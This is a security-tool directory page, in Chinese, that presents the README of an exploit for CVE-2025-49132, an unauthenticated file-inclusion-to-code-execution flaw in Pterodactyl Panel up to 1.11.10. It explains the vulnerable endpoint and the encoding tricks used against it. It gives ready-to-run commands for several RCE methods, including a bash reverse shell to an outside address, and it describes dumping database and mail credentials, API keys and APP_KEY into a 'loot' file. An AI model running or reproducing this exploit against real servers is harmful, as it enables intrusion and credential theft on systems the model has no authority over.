Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-49132 — 适用于 Pterodactyl Panel ≤ 1.11.10 的利用工具 - 未授权 LFI 到 RCE。 | Kitploit
工具/GitHubGitHub/yoyochaud/cve-2025-49132
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

适用于 Pterodactyl Panel ≤ 1.11.10 的利用工具 - 未授权 LFI 到 RCE。

查看仓库
25137个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-49132 - Pterodactyl Panel Unauthenticated RCE

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Exploit for Pterodactyl Panel ≤ 1.11.10 - unauthenticated LFI to RCE.

漏洞详情

/locales/locale.json端点接受locale和namespace参数,这些参数未经清理或认证直接传递给PHP的include()。旨在防止滥用的hash参数在未修补版本中从未被强制执行。

这允许:

  • 本地文件包含(LFI) - 读取任意.php配置文件(数据库凭据、APP_KEY、邮件、会话……)
  • 远程代码执行(RCE) - 通过包含pearcmd.php(register_argc_argv + config-create技巧)、PHP过滤器链或利用泄露的APP_KEY进行Laravel反序列化

影响范围: Pterodactyl Panel ≤ 1.11.10 修复版本: 1.11.11

为什么是这个PoC?

原始PoC使用Python的requests发送pearcmd载荷。问题在于:requests会静默地对<、>、{、}等字符进行URL编码,这会破坏嵌入在URL中的PHP标签(<?=system(...)?>)。

此漏洞利用程序通过两个关键更改解决了此问题:

  1. 使用curl进行阶段1 - 载荷创建请求通过subprocess使用curl -g(globoff),完全绕过Python的URL编码。
  2. 使用hex2bin()进行命令编码 - 不再注入原始命令(原始命令会因空格和特殊字符而中断),而是将命令进行十六进制编码,并在服务端使用system(hex2bin('...'))解码。十六进制只使用0-9a-f - 没有+、=、&、空格。这意味着任何命令都可以工作,包括带有>&和/dev/tcp/的反向Shell。
  3. 动态PEAR路径 - 与许多硬编码/usr/share/php的静态脚本不同,此工具完全支持--pear-dir参数。它会动态地将自定义路径注入到原始curl请求中,从而允许攻击具有非标准配置的目标。
  4. 一体化自动化 - 不再依赖针对不同向量的独立脚本,此工具完全自动化了整个攻击面(pearcmd、PHP过滤器、反序列化、LFI .php),检查每一种可能性以确保最可靠的RCE路径。

安装

root@kitploit:~
pip install requests

可选(用于过滤器链/反序列化RCE方法):

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

用法

RCE

root@kitploit:~
# 简单命令
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP过滤器链(需要php_filter_chain_generator在PATH中)
python3 exploit.py http://panel.fr --rce-filter "id"

# 预生成的过滤器链
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# 通过泄露的APP_KEY进行Laravel反序列化(需要phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# 使用其他pear目录的RCE
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# 反向Shell
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

完整配置转储(默认模式)

root@kitploit:~
# 转储所有配置(数据库凭据、APP_KEY、邮件、会话、CORS……)并尝试自动RCE
python3 exploit.py http://panel.fr

选项

常见的--pear-dir值

发行版路径
Debian / Ubuntu

默认模式转储内容

当不带--rce-cmd / --rce-filter / --rce-d运行时,此漏洞利用程序会执行完整的配置提取:

  • 数据库 - MySQL主机、端口、用户、密码、数据库名称 + Redis配置
  • 应用 - APP_KEY(→ Laravel反序列化)、版本、环境、调试模式
  • Pterodactyl - 面板特定设置、双因素认证配置、功能标志
  • 会话 - 驱动、Cookie配置、加密设置
  • 认证 - 锁定配置、密码重置过期时间
  • 服务 - 外部API密钥(Mailgun、Postmark等)
  • 邮件 - SMTP凭据、邮件程序配置
  • 队列/缓存/哈希/CORS/日志/文件系统
  • 敏感文件 - 尝试读取/etc/passwd、主机名、内核版本

完整JSON报告保存到loot.json(或通过-o指定自定义路径)。

致谢

此漏洞利用程序是对GRodolphe/CVE-2025-49132_poc中PoC的改进,该PoC本身受0xtensho/CVE-2025-49132-poc原始PoC的启发。

下载工具
选项描述
target目标URL(例如http://panel.pterodactyl.fr)
--rce-cmd CMD通过pearcmd执行CMD(支持任何命令,包括反向Shell)
--rce-filter CMD通过PHP过滤器链执行CMD
--filter-chain CHAIN使用预生成的php://filter链(与--rce-filter一起使用)
--rce-d CMD通过Laravel反序列化执行CMD
--pear-dir PATHpearcmd.php目录的路径(默认:/usr/share/php)
--timeout N请求超时秒数(默认:10)
--verify-ssl启用SSL证书验证(默认禁用)
-o FILE输出报告文件(默认:loot.json)
/usr/share/php(默认)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 或 /usr/share/php83
RHEL / Rocky/usr/share/pear